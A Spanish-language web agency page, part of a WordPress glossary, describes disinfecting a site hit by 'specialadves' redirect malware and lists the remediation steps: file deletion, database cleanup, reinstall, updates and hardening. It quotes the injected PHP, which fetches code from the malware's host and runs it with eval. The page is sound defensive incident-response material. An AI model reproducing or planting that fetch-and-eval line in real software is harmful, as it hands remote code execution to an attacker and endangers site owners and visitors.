Diccionario de WordPress

WordPress es la herramienta más usada del mundo para hacer páginas Web, no solo para blog o pymes, también la usan entidades como: La Casa Blanca de Estados Unidos (whitehouse.gov), Mercedes Benz, Renault, El New York Times (nytco.com),  BBC America, Spotify, el sitio oficial de Suecia (sweden.se), Harvard Gazette y wordpress.com (123M de visitas) entre otros. Por lo tanto no se puede dudar de su seguridad, escalabilidad o capacidad para adaptarse a diferentes escenarios.

El Diccionario de WordPress es un espacio de nuestra página Web donde recogemos temas de interés relacionados con este CMS de referencia mundial en el desarrollo Web. Se debe ver como un complemento a los manuales existentes.

Diccionario de WordPress. Logo azul de WordPress

Desinfección de specialadves

Tras una incidencia en una página web desarrollada con WordPress por un virus llamado que provoca una redirección de la página a otro dominio se aplica un protocolo que resuelve el problema.



Antecedentes

La página web está infectada por una inyección de código que instala el fichero tm en la raíz y genera la redirección.El contenido de ese fichero es el siguiente: Incluye esta instrucción:
 
$v=file_get_contents("http://w2w.specialadves.com/steps/s0.txt");
$v=str_replace("<?php","",$v);eval($v);
Seguramente la infectaron a través de una plantilla o plugin no actualizado.

Protocolo de desinfección aplicado

  1. Borrado de archivos
    1. Determinar versión con el archivo wp-includes/version.php: $wp_version = '5.3.12';
    2. Borrar todo menos wp-content
    3. Borrado de archivos de wp-content .hph de 08/04/2022
    4. Borrado de algún ficheros .hph
    5. No se borran las carpetas de los temas
  2. Base de datos
    1. Subir base de datos y reparar
    2. Borrar registro 2022 de wp-post.
    3. Buscar en base de datos specialadves. No se detecta en ningún registro
  3. Reinstalar WordPress
    1. Se busca la versión original de WordPress
    2. Descargar y subir los archivos de WordPress mediante FTP
    3. Reparar y asegurar
  4. Actualizar WordPress:
    1. Borrar usuario admin con nombre poco habitual.
    2. Cambiar contraseña débil del usuario admin por una de seguridad.
    3. Actualizar WordPress
    4. Actualizar PHP de 5.6 (muy obsoleto) a 7.4 en hosting
    5. Actualizar todos los plugins
    6. Activar SSL que estaba incluido en el contrato.
    7. Instalar Really Simple SSL.
    8. Instalación del plugin iThemes Security. Activar y configurar
    9. Revisión general para comprobar las diferentes áreas de la página.
Mas información sobre este tema en sucuri.net
Fecha: 12-05-2022
Etiquetas: Seguridad.

Volver

Más datos sobre el uso de WordPress

Correspondientes a 2021.

  • Su cuota de mercado de CMS es del 64%, el segundo es Shopify con el 5,2%.
  • Es el número uno en soluciones de eCommerce con un 25% de cuota de mercado gracias al plugin WooCommerce.
  • 455 millones de sitios Web están hechos con WP.
  • 409 millones de personas ven 21,2 mil millones de páginas de WP cada mes.
  • 661 nuevos sitios de WordPress se activan todos los días.

Actualizado con Limpiar HTML.

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.plugin cookies

ACEPTAR
Aviso de cookies
Salir de la versión móvil